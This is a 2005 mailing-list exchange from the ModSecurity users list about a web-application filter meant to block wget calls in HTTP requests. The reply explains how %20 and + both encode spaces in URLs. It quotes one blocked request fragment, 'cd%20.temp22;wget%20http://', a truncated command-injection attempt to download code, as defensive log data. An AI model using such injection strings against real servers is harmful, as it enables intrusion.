RE: [mod-security-users] Wget filter
Brought to you by:
victorhora,
zimmerletw
Menu
▾
▴
RE: [mod-security-users] Wget filter
|
From: Tkachenko A. <al...@tk...> - 2005-01-28 07:06:21
|
Thank you, Oliver. Still don't understand why my filter block and "wget" also :( Alexey. -----Original Message----- From: Oliver Schneider [mailto:Bor...@gm...] Sent: Friday, January 28, 2005 01:43 To: Tkachenko Alexei Cc: mod...@li... Subject: Re: [mod-security-users] Wget filter Privet, > 1) My logs always contain "wget+" but no "wget%" even if the following > request was blocked "cd%20.temp22;wget%20http://". > Why so? Why my log does not contain "wget%" at all? %20 is the escaped version of a blank space. (0x20 is the hexadecimal representation of the character code 32 which is a blank space). wget+ represents exactly the same, because blank space has two different representations in this encoding scheme: + and %20. Seems that Apache internally decodes %20 but not + which is natural since + may be a valid filename character. Hence you would find "wget " but not "wget%". By the way: this will only filter WGET calls (executing WGET), WGET itself allows to mimic any browser and cannot be blocked as a client. Oliver -- --------------------------------------------------- May the source be with you, stranger ;) ICQ: #281645 URL: http://assarbad.net |
